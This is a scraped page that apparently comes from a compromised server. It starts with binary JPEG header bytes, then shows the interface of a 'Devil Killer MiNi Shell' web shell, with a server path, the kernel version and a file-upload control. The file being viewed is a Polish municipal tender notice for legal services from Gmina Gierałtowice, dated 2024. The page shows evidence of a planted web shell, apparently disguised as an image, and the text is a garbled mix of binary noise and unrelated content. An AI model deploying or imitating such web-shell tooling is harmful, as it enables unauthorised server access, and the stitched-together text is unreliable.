JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241104/0057738601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowa obsługa prawna Referatów: IR, GM, OŚ, ZP, OKP, RZKO oraz samodzielnych stanowisk objętych przedmiotem zamówienia w UG Gierałtowice w 2025r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GIERAŁTOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257848</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Księdza Roboty 48</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gierałtowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-186</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 30 11 340, 32 30 11 350</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32 30 11 341</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@gieraltowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.gieraltowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa obsługa prawna Referatów: IR, GM, OŚ, ZP, OKP, RZKO oraz samodzielnych stanowisk objętych przedmiotem zamówienia w UG Gierałtowice w 2025r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-776347d5-47f2-4994-a0cc-affdecbac0c6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00577386</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00016394/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Kompleksowa obsługa prawna Referatów: IR, GM, OŚ, ZP, OKP, RZKO oraz samodzielnych stanowisk objętych przedmiotem zamówienia w UG Gierałtowice w 2025r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gieraltowice.ezamawiajacy.pl/pn/gieraltowice/demand/notice/publicpzp/current/list?USER_MENU_HOVER=publicpzpCurrentNoticePublicList <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gieraltowice.ezamawiajacy.pl/pn/gieraltowice/demand/notice/publicpzp/current/list?USER_MENU_HOVER=publicpzpCurrentNoticePublicList</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną. Ofertę, oświadczenia, podm. środki dowod,, pełnomocnictwa, zobow. podmiotu udost. zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozd. X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 2. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:3.1. drogą elektroniczną: zp@gieraltowice.pl; lub3.2. poprzez Platformę, dostępną pod adresem: https://gieraltowice.ezamawiajacy.pl3. Rejestracja na Platformie, w tym złożenie oferty w formie elektronicznej, wymaga: posiadania konta na Marketplanet OnePlace. 4. Rejestracja i korzystanie z Platformy. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Gmina Gierałtowice, https://gieraltowice.ezamawiajacy.pl lub https.://oneplace.marketplanet.pl.5. Zgodnie z 67 ustawy Pzp., Zamawiający podaje wymagania techn. związane z korzystaniem z Platformy:6.1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; a. Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;b. Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługującą TLS 1.2, ;c. Włączona obsługa JavaScript;d. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie.pdf. 6.2. Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:a. dokumenty w formacie „pdf” zaleca się podpisywać formatem PAdeS,b. dopuszcza się podpisanie dokumentów w formacie innym niż „pdf”, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.6.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi do 2 GB. Zamawiający zaleca w szczególności następujące formaty przesyłanych danych: pdf, doc, docx, zip, 7z . Dopuszcza się następujące formaty przesyłanych danych: xml, txt, rtf, xps, odt, ods, odp, xls, ppt, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv,tar, gz, gzip, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdeS, CAdeS, ASIC, XMLenc.6.4. Kodowanie określono w SWZ6.5. Zam. inf., iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platformy zakupowej Gminy Gierałtowice tel. +48 22 257 22 23) e-mail:oneplace@marketplanet.pl.6.6. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Marketplanet OnePlace. Regulamin znajduje się na stronie: https://oneplace.marketplanet.pl/regulamin_ezamawiajacy.6. W korespondencji należy posługiwać się numerem postępowania. 7. Wyk. może zwrócić się do zam. o wyjaśnienie SWZ.Wniosek należy przesłać za pośrednictwem poczty elektronicznej e-mail: zp@gieraltowice.pl lub na Platformie Zakupowej: https://gieraltowice.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Na podstawie art. 19 ust. 1 ustawy Pzp., w związku z art. 13 ust. 1-3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. Urz. UE L 119 z dnia 4 maja 2016 r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1.1. Administratorem danych osobowych jest Wójt Gminy Gierałtowice z siedzibą <br/>w Gierałtowicach przy ul. Ks. Roboty 48, e-mail: urzadgminy@gieraltowice.pl;<br/>1.2.	Administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@gieraltowice.pl lub pisemnie na adres siedziby Administratora;<br/>1.3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny sformalizowania procedur udzielania zamówień publicznych spoczywający <br/>na Zamawiającym; <br/>1.4. Odbiorcami danych osobowych jw. będą osoby lub podmioty, którym udostępniona zostanie <br/> dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września <br/> 2019 r.- Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320 z późniejszymi zmianami), <br/> dalej „ustawa Pzp”; podmioty, którym na podstawie umowy powierzono przetwarzanie <br/> danych osobowych w tym spółka Otwarty Rynek Elektroniczny S.A z siedzibą w Warszawie <br/> (02-672) przy ul. Domaniewskiego 49, właściciel Platformy Zakupowej, na której Urząd <br/> prowadzi postępowanie o udzielenie zamówienia publicznego, działającą pod adresem: <br/> https://gieraltowice.ezamawiajacy.pl; <br/>1.5.	Dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp. przez okres 4 lat <br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy<br/>(art. 78 ust. 4 Pzp.);<br/>1.6.	Po spełnieniu celu, dla którego dane zostały zebrane, mogą one być przechowywane jedynie w celach archiwalnych, przez okres, który wyznaczony zostanie przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej;<br/>1.7.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>1.8. W odniesieniu do udostępnionych danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>1.9. Osoba udostępniająca dane ma prawo:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących *;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ** ;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania <br/>o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO*** ;<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>1.10.	Osobie udostępniającej dane osobowe nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP/17/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 148000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest kompleksowa obsługa prawna Referatów: Inwestycji<br/>i Remontów, Gospodarowania Mieniem, Ochrony Środowiska, Zamówień Publicznych, Organizacyjno- Kadrowo-Płacowego, Zarządzania Kryzysowego, Spraw Obronnych i OC oraz samodzielnych stanowisk objętych przedmiotem zamówienia w UG Gierałtowice w 2025r. Przedmiot zamówienia obejmuje świadczenie kompleksowej obsługi prawnej niżej wymienionych komórek organizacyjnych w Urzędzie Gminy Gierałtowice tj.:<br/>- Referatu Inwestycji i Remontów (IR),<br/>- Referatu Gospodarowania Mieniem (GM),<br/>- Referatu Ochrony Środowiska (OŚ), <br/>- Referatu Zamówień Publicznych (ZP),<br/>- Referatu Organizacyjno- Kadrowo-Płacowego (OKP),<br/>- Referatu Zarządzania Kryzysowego, Spraw Obronnych i OC (RZKO),<br/>- Samodzielnego Stanowiska ds. Środków Zewnętrznych (ŚZ),<br/>- Samodzielnego stanowisko ds. Audytu i Kontroli (AK),<br/>- Inspektora Bezpieczeństwa i Higieny Pracy (BHP),<br/>- Pełnomocnika ds. Informacji Niejawnych (PIN),<br/>- Pełnomocnika ds. Rozwiązywania Problemów Alkoholowych (PPA),<br/>2. Szczegółowy opis oraz sposób realizacji zamówienia zawiera Opis Przedmiotu Zamówienia (OPZ), stanowiący Załącznik nr 7 do SWZ.<br/>3. Wymagania związane z realizacją zamówienia w zakresie zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26.06.1974 r. - Kodeks pracy (Dz. U. z 2023 r. poz. 1465 z późn.zm.). <br/>1)	Ze względu na specyfikę zamówienia Zamawiający nie wymaga zatrudnienia na podstawie umowy o pracę osób wykonywujących czynności związane z realizacją zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79112000-2 - Usługi reprezentacji prawnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1.1. Cena (C) - waga kryterium 40 %;<br/>1.2. Doświadczenie osoby wiodącej (radcy prawnego/ adwokata) który będzie wykonywał zamówienie)- waga kryterium 60 %.<br/><br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>2.1.	Cena (C) - waga 40%<br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt x 40%<br/> cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a. Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>2.2.	Doświadczenie osoby wiodącej (radcy prawnego/ adwokata) który będzie wykonywał zamówienie- waga 60%<br/><br/>2.2.1.	W kryterium „doświadczenie osoby wiodącej (radcy prawnego/ adwokata) który będzie wykonywał zamówienie” oferta może uzyskać maksymalnie 60 punktów.<br/>2.2.2.	W ramach kryterium „doświadczenie osoby wiodącej (radcy prawnego/ adwokata, który będzie wykonywał zamówienie” ocenie podlegać będzie:<br/><br/>a) doświadczenie wskazanej osoby w prowadzeniu obsługi prawnej co najmniej jednej gminy (lub innej jednostki samorządu terytorialnego) w zakresie obsługi prawnej co najmniej 2 wydziałów lub referatów w zakresie merytorycznym odpowiadającym zakresowi zadań referatów/wydziałów lub samodzielnych stanowisk wskazanych w Rozdziale IV niniejszej SWZ (w okresie ostatnich 3 lat ) przez:<br/>- minimum 11 miesięcy: 15 pkt.<br/>-powyżej 11 miesięcy: 20 pkt<br/>-powyżej 24 miesięcy 30 pkt<br/><br/>Maksymalna liczba punktów do zdobycia w tej pozycji: 30 pkt.<br/><br/>Przez zwrot „w okresie ostatnich 3 lat” użyty powyżej Zamawiający rozumie w okresie ostatnich 3 lat przed upływem terminu składania ofert)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2.2. Doświadczenie osoby wiodącej (radcy prawnego/ adwokata) który będzie wykonywał zamówienie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.4.zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że: <br/>2.4.1.	<br/>a) w okresie ostatnich czterech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, świadczył minimum dwie usługi polegające na wykonaniu usługi z zakresu pomocy prawnej na rzecz gminy ( lub innej jednostki samorządu terytorialnego) w zakresie obsługi prawnej jednostki, w zakresie co najmniej 5 wydziałów lub referatów lub samodzielnych stanowisk objętych przedmiotem zamówienia (przez okres minimum 11 miesięcy w ramach jednej jednostki) a w przypadku świadczeń okresowych lub ciągłych również wykonywanych - o wartości łącznie minimum 60 000 brutto/każda (w ramach jednej usługi) <br/>oraz <br/>b) w okresie ostatnich czterech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie:<br/>-wykonał przynajmniej jedną usługę doradztwa prawnego w postępowaniu administracyjnym w sprawie usunięcia odpadów w trybie art. 26 lub art. 26a) ustawy o odpadach oraz<br/>- wykonał przynajmniej jedną usługę doradztwa prawnego przy postępowaniu o udzielenie zamówienia publicznego na usuwanie i zagospodarowanie odpadów niebezpiecznych w trybie art. 26a) ustawy o odpadach o wartości przedmiotu zamówienia publicznego nie niższej niż 7 000 000,00 zł. brutto oraz <br/>-Wykonał albo wykonuje przynajmniej jedną usługę doradztwa prawnego w zakresie egzekucji kosztów usunięcia odpadów w trybie art. 26 lub art. 26a) ustawy o odpadach o wartości usługi nie mniej niż 60 000,00zł brutto, <br/>z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane lub są wykonywane oraz z załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie. Dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane. Jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych 